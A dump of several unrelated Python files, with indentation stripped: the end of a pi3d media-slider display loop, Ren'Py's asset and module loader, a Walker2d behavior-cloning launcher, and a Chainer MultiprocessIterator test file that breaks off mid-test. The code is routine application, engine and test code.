slider_action = ''
current_media = current_media - 1
else:
move_steps_media=move_steps_media+1
if slider_action == 'AfficherCategoriesAvecChangementMedia':
transitionMediaHaut(move_steps, nb_max_steps)
if move_steps < nb_max_steps:
move_steps=move_steps+1
else:
if Debug: print('AfficherCategoriesAvecChangementMedia')
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action == 'HautCategories':
if move_steps_cat <= nb_step_cat:
i=0
for cat in cats:
y=(i-current_cat-move_steps_cat/nb_step_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_cat-move_steps_cat/nb_step_cat)*distance_catz))
cat.position(0,y,z)
i=i+1
transitionMediaBas(move_steps_cat, nb_step_cat)
if move_steps_cat < nb_step_cat:
move_steps_cat=move_steps_cat+1
else:
current_cat = next_cat
current_souscat = -1
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action == 'BasCategories':
if move_steps_cat <= nb_step_cat:
i=0
for cat in cats:
y=(i-current_cat+move_steps_cat/nb_step_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_cat+move_steps_cat/nb_step_cat)*distance_catz))
cat.position(0,y,z)
i=i+1
#print("transitionMediaHaut")
transitionMediaHaut(move_steps_cat, nb_step_cat)
if move_steps_cat < nb_step_cat:
move_steps_cat=move_steps_cat+1
else:
current_cat = next_cat
current_souscat = -1
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action=='AfficherSousCategories':
# Display the media transition
transitionMediaBas(move_steps, nb_step_groupe_media)
# Display the category transitioning to the left
cat = cats[current_cat]
x=-2*move_steps/nb_step_groupe_media
y=move_steps/nb_step_groupe_media
z=-distance*1.8
cat.position(x,y,z)
if move_steps < nb_step_groupe_media:
move_steps=move_steps+1
else:
current_media = next_current_media
Medias = NextMedias
NextMedias = []
if Debug: print('dans le bloc if slider_action=="AfficherSousCategories", len(Medias) = ',len(Medias))
slider_action = ''
if slider_action=='HautSousCategories':
if move_steps_souscat <= nb_step_souscat:
i=0
for souscat in souscats:
y=(i-current_souscat-move_steps_souscat/nb_step_souscat)*distance_caty
z=-distance*(1.8-(abs(i-current_souscat-move_steps_souscat/nb_step_souscat)*distance_catz))
souscat.position(0,y,z)
i=i+1
#print("transitionMediaBas")
transitionMediaBas(move_steps_souscat, nb_step_souscat)
if move_steps_souscat < nb_step_souscat:
move_steps_souscat=move_steps_souscat+1
else:
current_souscat = next_souscat
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action=='BasSousCategories':
if move_steps_souscat <= nb_step_souscat:
i=0
for souscat in souscats:
y=(i-current_souscat+move_steps_souscat/nb_step_souscat)*distance_caty
z=-distance*(1.8-(abs(i-current_souscat+move_steps_souscat/nb_step_souscat)*distance_catz))
souscat.position(0,y,z)
i=i+1
#print("transitionMediaHaut")
transitionMediaHaut(move_steps_souscat, nb_step_souscat)
if move_steps_souscat < nb_step_souscat:
move_steps_souscat=move_steps_souscat+1
else:
current_souscat = next_souscat
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
######################################################################
# Draw the objects
# Draw the arrow and the frame when slider_mode is 'categorie'
if (slider_mode == 'categorie') and (action == ''):
fleche.draw()
if slider_mode=='categorie':
cadre.draw()
for cat in cats:
cat.draw()
if slider_mode=='souscategorie':
cadre.draw()
cat=cats[current_cat]
cat.draw()
for souscat in souscats:
souscat.draw()
if slider_action=='':
fleche.draw()
if slider_mode == 'categorie' and Blur:
defocus.start_blur()
# Display the media just before and just after the current media (plus the current one)
i=0
while (i < len(Medias)):
if (i > current_media -2) and (i < current_media + 2):
Media = Medias[i]
Media.media.draw()
i=i+1
# same for NextMedias
i=0
while (i < len(NextMedias)):
if (i > next_current_media -2) and (i < next_current_media + 2):
Media = NextMedias[i]
Media.media.draw()
i=i+1
# Display the current media's description text
if (slider_mode=='selection') and (slider_action==''):
Media = Medias[current_media]
Media.mediadesc.position(0,0,-distance*1.8)
Media.mediadesc.draw()
# Display the category and sub-category at the top left
if (slider_mode=='selection') and (len(cats2) > 0):
cats2[current_cat].position(-2,1,-distance*1.8)
cats2[current_cat].draw()
if current_souscat != -1:
souscats2[current_cat][current_souscat].position(-2,0.5,-distance*1.8)
souscats2[current_cat][current_souscat].draw()
if Fog:
if move_steps_cat==2:
if Debug: print("Fog")
if (slider_mode == 'categorie') or (slider_mode == 'souscategorie'):
for i in range(len(Medias)):
if i==current_media:
Medias[i].media.set_fog((0,0,0,0.9),30.0)
else:
Medias[i].media.set_fog((0,0,0,0.92),40.9)
for i in range(len(NextMedias)):
if i==next_current_media:
NextMedias[i].media.set_fog((0,0,0,0.9),30.0)
else:
NextMedias[i].media.set_fog((0,0,0,0.92),40.9)
#if current_media > 1:
#Medias[current_media-2].media.set_fog((0,0,0,0.92),40.9)
#if current_media > 0:
#Medias[current_media-1].media.set_fog((0,0,0,0.92),40.9)
#Medias[current_media].media.set_fog((0,0,0,0.9),30.0)
#if current_media < nb_images-1:
#Medias[current_media+1].media.set_fog((0,0,0,0.92),40.9)
#if current_media < nb_images-2:
#Medias[current_media+2].media.set_fog((0,0,0,0.92),40.9)
else:
for Media in Medias:
Media.media.set_fog((0,0,0,1),100)
for Media in NextMedias:
Media.media.set_fog((0,0,0,1),100)
if Blur:
if move_steps_cat==2:
if Debug: print("Blur")
if slider_mode == 'categorie':
defocus.end_blur()
for Media in Medias:
defocus.blur(Media.media, -distance/2, distance, 2) # if 4,9,5 : 4 is focal distance, >= 9 distance will get 5 x blurring, nearer than focus also blurs
for Media in NextMedias:
defocus.blur(Media.media, -distance/2, distance, 2) # if 4,9,5 : 4 is focal distance, >= 9 distance will get 5 x blurring, nearer than focus also blurs
fleche.position(0,0,-39)
fleche.draw()
# Slider timeout
slider_timeout = slider_timeout-1
if (slider_timeout % 10) == 0:
if Debug: print('slider_timeout = ',slider_timeout)
if slider_timeout <= 0: SliderTimeout()
"""
hand.rotateToY(110)
#hand.rotateIncY(3)
hand.rotateToX(-80)
#hand.rotateIncX(3)
hand.rotateToZ(10)
#hand.rotateIncZ(1)
hand.position(10,-7+move_steps/6,-19)
#hand.position(0,-1,-32)
#hand.position(10,-6+move_steps/2,40)
hand.draw()
#sprite.rotateToX(20)
sprite.position(14,-7.5,-10)
sprite.draw()
"""
# action from the scenario that destroys the pi3d display
if slider_stop==True:
#mykeys.close()
DISPLAY.destroy()
break
# Timeline
if PlayedMediaId :
try:
position=int(round(Player.position()*10))
for event_time in MediaTimeline:
if position==int(event_time):
for actionid in MediaTimeline[event_time]:
Lance(actionid)
MediaTimeline.pop(event_time, None)
except:
pass
GPIO.cleanup()
if RS232_ok:
RS232.close()
if RS232_2_ok:
RS232_2.close()
print("******************")
print("***** Terminé ****")
print("******************")
|
loader.py
|
# Copyright 2004-2014 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import renpy
import os.path
from pickle import loads
from cStringIO import StringIO
import sys
import types
import threading
# Ensure the utf-8 codec is loaded, to prevent recursion when we use it
# to look up filenames.
u"".encode("utf-8")
################################################################## Asset Loading
try:
import android.apk
expansion = os.environ.get("ANDROID_EXPANSION", None)
if expansion is not None:
print "Using expansion file", expansion
apks = [
android.apk.APK(apk=expansion, prefix='assets/x-game/'),
android.apk.APK(apk=expansion, prefix='assets/x-renpy/x-common/'),
]
game_apks = [ apks[0] ]
else:
print "Not using expansion file."
apks = [
android.apk.APK(prefix='assets/x-game/'),
android.apk.APK(prefix='assets/x-renpy/x-common/'),
]
game_apks = [ apks[0] ]
except ImportError:
apks = [ ]
game_apks = [ ]
# Files on disk should be checked before archives. Otherwise, among
# other things, using a new version of bytecode.rpyb will break.
archives = [ ]
# The value of renpy.config.archives the last time index_archives was
# run.
old_config_archives = None
# A map from lower-case filename to regular-case filename.
lower_map = { }
def index_archives():
"""
Loads in the indexes for the archive files. Also updates the lower_map.
"""
# Update lower_map.
lower_map.clear()
for dir, fn in listdirfiles(): #@ReservedAssignment
lower_map[fn.lower()] = fn
# Index the archives.
global old_config_archives
if old_config_archives == renpy.config.archives:
return
old_config_archives = renpy.config.archives[:]
global archives
archives = [ ]
for prefix in renpy.config.archives:
try:
fn = transfn(prefix + ".rpa")
f = file(fn, "rb")
l = f.readline()
# 3.0 Branch.
if l.startswith("RPA-3.0 "):
offset = int(l[8:24], 16)
key = int(l[25:33], 16)
f.seek(offset)
index = loads(f.read().decode("zlib"))
# Deobfuscate the index.
for k in index.keys():
if len(index[k][0]) == 2:
index[k] = [ (offset ^ key, dlen ^ key) for offset, dlen in index[k] ]
else:
index[k] = [ (offset ^ key, dlen ^ key, start) for offset, dlen, start in index[k] ]
archives.append((prefix, index))
f.close()
continue
# 2.0 Branch.
if l.startswith("RPA-2.0 "):
offset = int(l[8:], 16)
f.seek(offset)
index = loads(f.read().decode("zlib"))
archives.append((prefix, index))
f.close()
continue
# 1.0 Branch.
f.close()
fn = transfn(prefix + ".rpi")
index = loads(file(fn, "rb").read().decode("zlib"))
archives.append((prefix, index))
except:
raise
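# Added note (inferred from the parsing above, not an authoritative format spec):
# an RPA-3.0 archive begins with an ASCII header line of the form
#     RPA-3.0 <16 hex digits: index offset> <8 hex digits: xor key>
# The zlib-compressed, pickled index sits at that offset, and every (offset, length)
# pair it contains is obfuscated by xor-ing with the key, which index_archives undoes.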
def walkdir(dir): #@ReservedAssignment
rv = [ ]
if not os.path.exists(dir) and not renpy.config.developer:
return rv
for i in os.listdir(dir):
if i[0] == ".":
continue
if os.path.isdir(dir + "/" + i):
for fn in walkdir(dir + "/" + i):
rv.append(i + "/" + fn)
else:
rv.append(i)
return rv
def listdirfiles(common=True):
"""
Returns a list of directory, file tuples known to the system. If
the file is in an archive, the directory is None.
"""
rv = [ ]
seen = set()
if common:
list_apks = apks
else:
list_apks = game_apks
for apk in list_apks:
for f in apk.list():
# Strip off the "x-" in front of each filename, which is there
# to ensure that aapt actually includes every file.
f = "/".join(i[2:] for i in f.split("/"))
if f not in seen:
rv.append((None, f))
seen.add(f)
for i in renpy.config.searchpath:
if (not common) and (renpy.config.commondir) and (i == renpy.config.commondir):
continue
i = os.path.join(renpy.config.basedir, i)
for j in walkdir(i):
if j not in seen:
rv.append((i, j))
seen.add(j)
for _prefix, index in archives:
for j in index.iterkeys():
if j not in seen:
rv.append((None, j))
seen.add(j)
return rv
class SubFile(object):
def __init__(self, f, base, length, start):
self.f = f
self.base = base
self.offset = 0
self.length = length
self.start = start
if start is None:
self.name = self.f.name
else:
self.name = None
self.f.seek(self.base)
def __enter__(self):
return self
def __exit__(self, _type, value, tb):
self.close()
return False
def read(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
rv1 = self.start[self.offset:self.offset + length]
length -= len(rv1)
self.offset += len(rv1)
if length:
rv2 = self.f.read(length)
self.offset += len(rv2)
else:
rv2 = ""
return (rv1 + rv2)
def readline(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
# If we're in the start, then read the line ourselves.
if self.offset < len(self.start):
rv = ''
while length:
c = self.read(1)
rv += c
if c == '\n':
break
length -= 1
return rv
# Otherwise, let the system read the line all at once.
rv = self.f.readline(length)
self.offset += len(rv)
return rv
def readlines(self, length=None):
rv = [ ]
while True:
l = self.readline(length)
if not l:
break
if length is not None:
length -= len(l)
if length < 0:
break
rv.append(l)
return rv
def xreadlines(self):
return self
def __iter__(self):
return self
def next(self): #@ReservedAssignment
rv = self.readline()
if not rv:
raise StopIteration()
return rv
def flush(self):
return
def seek(self, offset, whence=0):
if whence == 0:
offset = offset
elif whence == 1:
offset = self.offset + offset
elif whence == 2:
offset = self.length + offset
if offset > self.length:
offset = self.length
self.offset = offset
offset = offset - len(self.start)
if offset < 0:
offset = 0
self.f.seek(offset + self.base)
def tell(self):
return self.offset
def close(self):
self.f.close()
def write(self, s):
raise Exception("Write not supported by SubFile")
def load_core(name):
"""
Returns an open python file object of the given type.
"""
name = lower_map.get(name.lower(), name)
if renpy.config.file_open_callback:
rv = renpy.config.file_open_callback(name)
if rv is not None:
return rv
# Look for the file in the apk.
for apk in apks:
prefixed_name = "/".join("x-" + i for i in name.split("/"))
try:
return apk.open(prefixed_name)
except IOError:
pass
# Look for the file directly.
if not renpy.config.force_archives:
try:
fn = transfn(name)
return file(fn, "rb")
except:
pass
# Look for it in archive files.
for prefix, index in archives:
if not name in index:
continue
f = file(transfn(prefix + ".rpa"), "rb")
data = [ ]
# Direct path.
if len(index[name]) == 1:
t = index[name][0]
if len(t) == 2:
offset, dlen = t
start = ''
else:
offset, dlen, start = t
rv = SubFile(f, offset, dlen, start)
# Compatibility path.
else:
for offset, dlen in index[name]:
f.seek(offset)
data.append(f.read(dlen))
rv = StringIO(''.join(data))
f.close()
return rv
return None
def get_prefixes():
"""
Returns a list of prefixes to search for files.
"""
rv = [ ]
language = renpy.game.preferences.language
if language is not None:
rv.append(renpy.config.tl_directory + "/" + language + "/")
rv.append("")
return rv
def load(name):
if renpy.config.reject_backslash and "\\" in name:
raise Exception("Backslash in filename, use '/' instead: %r" % name)
for p in get_prefixes():
rv = load_core(p + name)
if rv is not None:
return rv
raise IOError("Couldn't find file '%s'." % name)
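# Illustrative example (assuming config.tl_directory is the default "tl"
# and the language preference is "french"): load("gui/window.png") first
# tries "tl/french/gui/window.png" and then falls back to plain
# "gui/window.png".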
loadable_cache = { }
def loadable_core(name):
"""
Returns True if the name is loadable with load, False if it is not.
"""
name = lower_map.get(name.lower(), name)
if name in loadable_cache:
return loadable_cache[name]
for apk in apks:
prefixed_name = "/".join("x-" + i for i in name.split("/"))
if prefixed_name in apk.info:
return True
try:
transfn(name)
loadable_cache[name] = True
return True
except:
pass
for _prefix, index in archives:
if name in index:
loadable_cache[name] = True
return True
loadable_cache[name] = False
return False
def loadable(name):
for p in get_prefixes():
if loadable_core(p + name):
return True
return False
def transfn(name):
"""
Tries to translate the name to a file that exists in one of the
searched directories.
"""
name = lower_map.get(name.lower(), name)
if renpy.config.reject_backslash and "\\" in name:
raise Exception("Backslash in filename, use '/' instead: %r" % name)
if isinstance(name, str):
name = name.decode("utf-8")
for d in renpy.config.searchpath:
fn = os.path.join(renpy.config.basedir, d, name)
add_auto(fn)
if os.path.exists(fn):
return fn
raise Exception("Couldn't find file '%s'." % name)
def get_mtime(name):
"""
Returns the time the named file was last modified, or 0 if it
doesn't exist or is archived.
"""
for p in get_prefixes():
try:
fn = transfn(p + name)
return os.path.getmtime(fn)
except:
pass
return 0
################################################################# Module Loading
class RenpyImporter(object):
"""
An importer that tries to load modules from the places where Ren'Py
searches for data files.
"""
def __init__(self, prefix=""):
self.prefix = prefix
def translate(self, fullname, prefix=""):
try:
fn = (prefix + fullname.replace(".", "/")).decode("utf8")
except:
# raise Exception("Could importer-translate %r + %r" % (prefix, fullname))
return None
if loadable(fn + ".py"):
return fn + ".py"
if loadable(fn + "/__init__.py"):
return fn + "/__init__.py"
return None
def find_module(self, fullname, path=None):
if path is not None:
for i in path:
if self.translate(fullname, i):
return RenpyImporter(i)
if self.translate(fullname):
return self
def load_module(self, fullname):
filename = self.translate(fullname, self.prefix)
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__name__ = fullname
mod.__file__ = filename
mod.__loader__ = self
if filename.endswith("__init__.py"):
mod.__path__ = [ filename[:-len("__init__.py")] ]
source = load(filename).read().decode("utf8")
if source and source[0] == u'\ufeff':
source = source[1:]
source = source.encode("raw_unicode_escape")
source = source.replace("\r", "")
code = compile(source, filename, 'exec')
exec code in mod.__dict__
return mod
def get_data(self, filename):
return load(filename).read()
def init_importer():
sys.meta_path.append(RenpyImporter())
def quit_importer():
sys.meta_path.pop()
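# Hypothetical usage sketch: once init_importer() has been called, normal
# Python imports are resolved through loadable()/load() above, so a module
# shipped as a game data file can be imported directly. The module name
# below is made up for illustration.
#
#   init_importer()
#   import mygamelib      # resolved via loadable("mygamelib.py")
#   quit_importer()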
#################################################################### Auto-Reload
# This is set to True if the autoreload thread has detected that an autoreload is needed.
needs_autoreload = False
# A map from filename to mtime, or None if the file doesn't exist.
auto_mtimes = { }
# The thread used for autoreload.
auto_thread = None
# True if auto_thread should run. False if it should quit.
auto_quit_flag = True
# The lock used by auto_thread.
auto_lock = threading.Condition()
# Used to indicate that this file is blacklisted.
auto_blacklisted = renpy.object.Sentinel("auto_blacklisted")
def auto_mtime(fn):
"""
Gets the mtime of fn, or None if the file does not exist.
"""
try:
return os.path.getmtime(fn)
except:
return None
def add_auto(fn):
"""
Adds fn as a file we watch for changes. If its mtime changes or the file
starts/stops existing, we trigger a reload.
"""
if not renpy.autoreload:
return
if fn in auto_mtimes:
return
for e in renpy.config.autoreload_blacklist:
if fn.endswith(e):
with auto_lock:
auto_mtimes[fn] = auto_blacklisted
return
mtime = auto_mtime(fn)
with auto_lock:
auto_mtimes[fn] = mtime
def auto_thread_function():
"""
This thread sets needs_autoreload when necessary.
"""
global needs_autoreload
while True:
with auto_lock:
auto_lock.wait(1.5)
if auto_quit_flag:
return
items = auto_mtimes.items()
for fn, mtime in items:
if mtime is auto_blacklisted:
continue
if auto_mtime(fn) != mtime:
needs_autoreload = True
def auto_init():
"""
Starts the autoreload thread.
"""
global auto_thread
global auto_quit_flag
global needs_autoreload
needs_autoreload = False
if not renpy.autoreload:
return
auto_quit_flag = False
auto_thread = threading.Thread(target=auto_thread_function)
auto_thread.daemon = True
auto_thread.start()
def auto_quit():
"""
Terminates the autoreload thread.
"""
global auto_quit_flag
if auto_thread is None:
return
auto_quit_flag = True
with auto_lock:
auto_lock.notify_all()
auto_thread.join()
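# Illustrative lifecycle (not from the original source): the autoreload
# machinery is driven by three calls, with files registered as a side
# effect of transfn() calling add_auto().
#
#   auto_init()                 # start the watcher thread
#   while running_main_loop:    # hypothetical main loop
#       if needs_autoreload:
#           trigger_reload()    # hypothetical game-specific reload
#   auto_quit()                 # stop the watcher on shutdown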
|
behavior_cloning.py
|
"""Author: Brandon Trabucco, Copyright 2019, MIT License"""
import multiprocessing
from cs285.baselines.imitate.behavior_cloning import BehaviorCloning
from gym.envs.mujoco.walker2d import Walker2dEnv
def run_experiment(experiment_id):
BehaviorCloning(
Walker2dEnv,
logging_dir="./walker2d/behavior_cloning/{}".format(experiment_id),
hidden_size=256,
num_hidden_layers=2,
exploration_noise_std=0.1,
expert_policy_ckpt="./walker2d/expert_policy.ckpt",
num_threads=10,
max_path_length=1000,
max_num_steps=1000000,
batch_size=256,
num_epochs=1000,
num_episodes_per_epoch=0,
num_trains_per_epoch=10,
num_episodes_before_train=10,
num_epochs_per_eval=1,
num_episodes_per_eval=10).launch()
if __name__ == "__main__":
num_seeds = 5
for seed in range(num_seeds):
multiprocessing.Process(target=run_experiment, args=(seed,)).start()
|
test_multiprocess_iterator.py
|
from __future__ import division
import copy
import errno
import os
import signal
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import numpy
import six
from chainer import iterators
from chainer import serializer
from chainer import testing
class DummySerializer(serializer.Serializer):
def __init__(self, target):
super(DummySerializer, self).__init__()
self.target = target
def __getitem__(self, key):
raise NotImplementedError
def __call__(self, key, value):
self.target[key] = value
return self.target[key]
class DummyDeserializer(serializer.Deserializer):
def __init__(self, target):
super(DummyDeserializer, self).__init__()
self.target = target
def __getitem__(self, key):
raise NotImplementedError
def __call__(self, key, value):
if value is None:
value = self.target[key]
elif isinstance(value, numpy.ndarray):
numpy.copyto(value, self.target[key])
else:
value = type(value)(numpy.asarray(self.target[key]))
return value
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
'order_sampler': [
None, lambda order, _: numpy.random.permutation(len(order))],
}))
class TestMultiprocessIterator(unittest.TestCase):
def setUp(self):
self.n_processes = 2
self.options = {'n_processes': self.n_processes,
'n_prefetch': self.n_prefetch,
'shared_mem': self.shared_mem}
if self.order_sampler is not None:
self.options.update(
{'order_sampler': self.order_sampler})
def test_iterator_repeat(self):
dataset = [1, 2, 3, 4, 5, 6]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i + 0 / 6)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
self.assertAlmostEqual(it.epoch_detail, i + 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 4 / 6)
def test_iterator_list_type(self):
dataset = [[i, numpy.zeros((10,)) + i] for i in range(6)]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batches = {}
for j in range(3):
batch = it.next()
self.assertEqual(len(batch), 2)
if j != 2:
self.assertFalse(it.is_new_epoch)
else:
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(
it.epoch_detail, (3 * i + j + 1) * 2 / 6)
self.assertAlmostEqual(
it.previous_epoch_detail, (3 * i + j) * 2 / 6)
for x in batch:
self.assertIsInstance(x, list)
self.assertIsInstance(x[1], numpy.ndarray)
batches[x[0]] = x[1]
self.assertEqual(len(batches), len(dataset))
for k, v in six.iteritems(batches):
numpy.testing.assert_allclose(dataset[k][1], v)
def test_iterator_tuple_type(self):
dataset = [(i, numpy.zeros((10,)) + i) for i in range(6)]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batches = {}
for j in range(3):
batch = it.next()
self.assertEqual(len(batch), 2)
if j != 2:
self.assertFalse(it.is_new_epoch)
else:
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(
it.epoch_detail, (3 * i + j + 1) * 2 / 6)
self.assertAlmostEqual(
it.previous_epoch_detail, (3 * i + j) * 2 / 6)
for x in batch:
self.assertIsInstance(x, tuple)
self.assertIsInstance(x[1], numpy.ndarray)
batches[x[0]] = x[1]
self.assertEqual(len(batches), len(dataset))
for k, v in six.iteritems(batches):
numpy.testing.assert_allclose(dataset[k][1], v)
def test_iterator_dict_type(self):
dataset = [{i: numpy.zeros((10,)) + i} for i in range(6)]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batches = {}
for j in range(3):
batch = it.next()
self.assertEqual(len(batch), 2)
if j != 2:
self.assertFalse(it.is_new_epoch)
else:
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(
it.epoch_detail, (3 * i + j + 1) * 2 / 6)
self.assertAlmostEqual(
it.previous_epoch_detail, (3 * i + j) * 2 / 6)
for x in batch:
self.assertIsInstance(x, dict)
k = tuple(x)[0]
v = x[k]
self.assertIsInstance(v, numpy.ndarray)
batches[k] = v
self.assertEqual(len(batches), len(dataset))
for k, v in six.iteritems(batches):
x = dataset[k][tuple(dataset[k])[0]]
numpy.testing.assert_allclose(x, v)
def test_iterator_repeat_not_even(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
batches = sum([it.next() for _ in range(5)], [])
self.assertEqual(sorted(batches), sorted(dataset * 2))
def test_iterator_not_repeat(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
def test_iterator_not_repeat_not_even(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
self.assertAlmostEqual(it.epoch_detail, 0 / 5)
self.assertIsNone(it.previous_epoch_detail)
batch1 = it.next()
self.assertAlmostEqual(it.epoch_detail, 2 / 5)
self.assertAlmostEqual(it.previous_epoch_detail, 0 / 5)
batch2 = it.next()
self.assertAlmostEqual(it.epoch_detail, 4 / 5)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 5)
batch3 = it.next()
self.assertAlmostEqual(it.epoch_detail, 5 / 5)
self.assertAlmostEqual(it.previous_epoch_detail, 4 / 5)
self.assertRaises(StopIteration, it.next)
self.assertEqual(len(batch3), 1)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
def test_iterator_shuffle_divisible(self):
dataset = list(range(10))
it = iterators.MultiprocessIterator(
dataset, 10, **self.options)
self.assertNotEqual(it.next(), it.next())
def test_iterator_shuffle_nondivisible(self):
dataset = list(range(10))
it = iterators.MultiprocessIterator(
dataset, 3, **self.options)
out = sum([it.next() for _ in range(7)], [])
self.assertNotEqual(out[0:10], out[10:20])
def test_copy_not_repeat(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
copy_it = copy.copy(it)
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
it = None
batches = sum([copy_it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, copy_it.next)
def test_reset(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
for trial in range(4):
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
it.reset()
def test_reset_middle(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
for trial in range(4):
it.next()
it.reset()
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
it.reset()
def test_reset_repeat(self):
dataset = [1, 2, 3, 4]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=True, **self.options)
for trial in range(4):
batches = sum([it.next() for _ in range(4)], [])
self.assertEqual(sorted(batches), sorted(2 * dataset))
it.reset()
def test_unsupported_reset_finalized(self):
dataset = [1, 2, 3, 4]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
it.next()
it.next()
it.finalize()
self.assertRaises(NotImplementedError, it.reset)
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
'order_sampler': [
None, lambda order, _: numpy.random.permutation(len(order))],
}))
class TestMultiprocessIteratorSerialize(unittest.TestCase):
def setUp(self):
self.n_processes = 2
self.options = {'n_processes': self.n_processes,
'n_prefetch': self.n_prefetch,
'shared_mem': self.shared_mem}
if self.order_sampler is not None:
self.options.update(
{'shuffle': None, 'order_sampler': self.order_sampler})
def test_iterator_serialize(self):
dataset = [1, 2, 3, 4, 5, 6]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
self.assertEqual(it.epoch, 0)
self.assertAlmostEqual(it.epoch_detail, 0 / 6)
self.assertIsNone(it.previous_epoch_detail)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
target = dict()
it.serialize(DummySerializer(target))
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
it.serialize(DummyDeserializer(target))
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
